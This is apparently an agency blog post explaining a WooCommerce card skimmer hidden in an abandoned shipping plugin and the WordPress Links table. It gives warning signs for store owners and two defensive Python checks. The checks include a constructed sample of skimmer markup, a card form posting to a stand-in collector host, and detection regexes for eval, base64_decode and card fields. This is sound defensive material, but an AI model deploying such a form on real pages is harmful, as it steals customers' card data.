If you run a WooCommerce store, here's a scenario that should make you sit up: a customer completes their order, payment goes through, and then, on the "thank you" page, they're shown a box asking them to type in their card number, expiry date and CVC again to "confirm" the order. If they do, they get charged a second time, a duplicate order is created, and their full card details are quietly sent to a criminal on the other side of the world.
We recently found exactly this on a client's store. What made it genuinely alarming wasn't the skimmer itself; it was how well it was hidden. The site was running a reputable security plugin, scans were coming back clean, and the malicious code had been sitting there, silently harvesting card details, for more than two years.
Here's how it works, how you can spot it, and why your security scanner never said a word.
How you discover it as a store owner
This particular infection is sneaky because, for the most part, your store works perfectly normally. Orders come in, payments are taken, everything looks healthy in your dashboard. The giveaway only appears at one specific moment, and often only to your customers, not to you.
These are the tell-tale signs:
- A card-details box on the order-complete / "thank you" page. After checkout has already succeeded, the customer sees a form titled something like "Confirm Order Number: 44897" with fields for Card Number, MM/YY and CVC, and a Confirm button.
- Duplicate orders and double charges. Customers who fill in that "confirmation" box get charged a second time and a duplicate order appears.
- It happens regardless of payment method. Whether the customer paid by card, Apple Pay or PayPal, the fake box shows up after the order completes.
- You, the admin, might never see it. This is the clever part: the malicious code is written to hide itself from administrators. When you place a test order while logged in, everything can look fine, which is exactly why these infections run for so long before anyone realises.
- Your security scanner reports nothing. Clean scan, green ticks, no alerts.
In our client's case, the owner only found out because a customer reported being asked for their card twice. A test order from a logged-out phone confirmed it instantly.
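The same logged-out check can be run against the saved HTML of an order-received page. This is an added example, not part of the original investigation: the hint list, the `shop.example` host and both sample pages are constructed, and it assumes the form is present in the HTML the server returns rather than drawn later by script.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attribute fragments that suggest a card-entry field (assumed list; the
# wording follows the form described above: Card Number, MM/YY, CVC).
CARD_HINTS = ("card number", "cardnumber", "cc-number", "mm/yy", "cc-exp",
              "cvc", "cvv", "cc-csc")


class CardFieldFinder(HTMLParser):
    """Collects card-like inputs and form targets from a page."""

    def __init__(self):
        super().__init__()
        self.card_fields = []
        self.form_actions = []

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.form_actions.append(attrs.get("action", ""))
        elif tag == "input":
            keys = ("name", "id", "placeholder", "autocomplete", "aria-label")
            text = " ".join(attrs.get(k, "") for k in keys).lower()
            self.card_fields += [h for h in CARD_HINTS if h in text][:1]


def audit_thankyou_page(html, store_host):
    """Report card inputs and off-site form targets on an order-received page."""
    finder = CardFieldFinder()
    finder.feed(html)
    external = [a for a in finder.form_actions
                if urlparse(a).hostname not in (None, store_host)]
    return {"card_fields": finder.card_fields,
            "external_form_targets": external,
            "suspicious": bool(finder.card_fields)}


# Constructed sample markup: a normal thank-you page and one with the extra form.
CLEAN_PAGE = ('<h1>Order received</h1><p>Thank you.</p>'
              '<form action="/?s="><input name="s" placeholder="Search products"></form>')
INFECTED_PAGE = (
    '<h1>Order received</h1><form action="https://collector.invalid/c" method="post">'
    '<h3>Confirm Order Number: 44897</h3>'
    '<input type="hidden" name="billing_email" value="a@example.com">'
    '<input placeholder="Card Number"><input placeholder="MM/YY">'
    '<input placeholder="CVC"><button>Confirm</button></form>'
)
```

Save the page from a logged-out session, because the code hides itself from administrators; any card field on a page shown after payment has completed is worth investigating.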
The culprit: an abandoned shipping plugin
The infection was anchored in a plugin called WooCommerce Advanced Shipping.
It's worth being clear: this isn't because the plugin is malicious; it's because it's abandoned. The plugin hasn't been maintained for years and has been pulled from the official WordPress plugin directory. Abandoned plugins are a favourite target for attackers precisely because nobody is shipping security updates for them anymore, and store owners rarely notice they've gone stale. Once an attacker finds a way in, an old, forgotten plugin file is a perfect, low-traffic place to hide.
The lesson here applies far beyond this one plugin: every unmaintained plugin on your site is an open door waiting to be used.
How the attack actually works
What makes this skimmer so effective is that it's built in two separate pieces, and that split is the whole reason it evades detection.
Piece one: the loader (hidden in a plugin file). A few lines of code were quietly inserted into the shipping plugin. They do nothing on a normal page. But the moment a visitor lands on the order-received page, the code wakes up, reaches into the website's database, pulls out a chunk of stored instructions, and runs them.
Piece two: the payload (hidden in the database). The actual skimmer, the part that draws the fake card form and steals the details, wasn't stored in a file at all. It was tucked away inside an old, unused corner of the WordPress database: the "Links" (Blogroll) feature, a relic from the early days of WordPress that almost no modern store uses. Because it's empty and forgotten on virtually every site, it's the perfect hiding spot.
When the two pieces combine on the thank-you page, the payload:
- Reads the real order details (order number, name, address, email, phone).
- Draws a convincing "Confirm Order Number" form styled to look like a legitimate part of your checkout.
- Pre-fills hidden fields with the customer's genuine order data, so what they're submitting looks authentic.
- Captures the card number, expiry and CVC the customer types in.
- Sends all of it to a server controlled by the attacker, and, because the data has already left your site, charges the customer again in the process.
And, as mentioned, it deliberately skips all of this when an administrator is viewing the page.
Why your security scanner missed it completely
This is the part every store owner needs to understand, because it's a dangerous and widespread blind spot.
Most security plugins scan your files. They do not scan the contents of your database.
The attackers know this. By keeping the dangerous payload, the skimmer itself, out of the files and inside the database, they sidestep the scanner entirely. The only thing left in the files was a tiny, innocent-looking snippet that, on its own, doesn't obviously do anything wrong. There was simply nothing for a file scanner to flag.
That's how a live, working card skimmer can hum along on a busy store for years while every scan comes back clean. A green tick from your security plugin tells you your files look okay. It tells you nothing about what's hiding in your database.
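One way to cover that blind spot is to inspect the Links table itself. The sketch below is an added example, not code from the affected site or from any security plugin: it assumes the rows of the WordPress links table (`wp_links` with the default prefix) have been exported as dictionaries, and the marker patterns, length threshold and sample rows are constructed for illustration.

```python
import re

# Text columns of the WordPress links table (wp_links with the default prefix).
TEXT_COLUMNS = ("link_url", "link_name", "link_image", "link_target",
                "link_description", "link_rel", "link_notes", "link_rss")

# Heuristic markers (assumed, not taken from the real payload): content that
# has no business in a blogroll entry.
MARKERS = {
    "php_code": re.compile(
        r"<\?php|\b(?:eval|assert|base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "script_or_form": re.compile(r"<\s*(?:script|form|input|iframe)\b", re.I),
    "card_wording": re.compile(r"card\s*number|\bcvc\b|\bcvv\b|mm\s*/\s*yy", re.I),
    "encoded_blob": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
}
MAX_PLAIN_LENGTH = 1000  # a genuine blogroll note is a short line of text


def audit_links_rows(rows):
    """Return one finding per row that looks like stored code rather than a link."""
    findings = []
    for row in rows:
        reasons = set()
        for column in TEXT_COLUMNS:
            value = str(row.get(column) or "")
            if len(value) > MAX_PLAIN_LENGTH:
                reasons.add(f"oversized:{column}")
            for name, pattern in MARKERS.items():
                if pattern.search(value):
                    reasons.add(f"{name}:{column}")
        if reasons:
            findings.append({"link_id": row.get("link_id"), "reasons": sorted(reasons)})
    return findings


# Constructed sample rows: one ordinary blogroll entry, one carrying markup.
SAMPLE_ROWS = [
    {"link_id": 1, "link_url": "https://example.org/", "link_name": "Example",
     "link_notes": "Friend's blog"},
    {"link_id": 2, "link_url": "https://example.invalid/", "link_name": "cache",
     "link_notes": "<form><input placeholder='Card Number'><input placeholder='CVC'></form>"},
]

if __name__ == "__main__":
    for finding in audit_links_rows(SAMPLE_ROWS):
        print(finding)
```

On a store that has never used the Links feature, any row in that table deserves a manual look, whether or not it trips one of these markers.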
Why this matters so much
This isn't a cosmetic bug or a minor nuisance. For the entire time it's active, an infection like this means:
- Your customers' card numbers and CVCs are being stolen, transaction after transaction.
- Customers are being charged twice, creating refunds, chargebacks and angry emails.
- Your store is the source of a card-data breach, which carries real legal and PCI compliance obligations, and serious damage to your reputation and your relationship with your payment provider.
The longer it runs undetected, the bigger the exposure. Two-plus years, in our client's case.
Worried your store might be affected?
If any of the warning signs above sound familiar (a card box appearing after checkout, reports of double charges), or you've simply never had a proper, database-level security review, it's worth getting checked. And remember: a clean scan from your existing security plugin does not rule this out.
At Samson Web Design, we've dealt with this exact infection from end to end. We know where it hides, how to confirm whether your store is affected, how to remove it cleanly, and, just as importantly, how to find out how the attackers got in and shut that door so it can't happen again.
If you'd like us to check your WooCommerce store, get in touch and we'll take a look. It's far cheaper to find this now than to discover it after your customers, or your card processor, find it for you.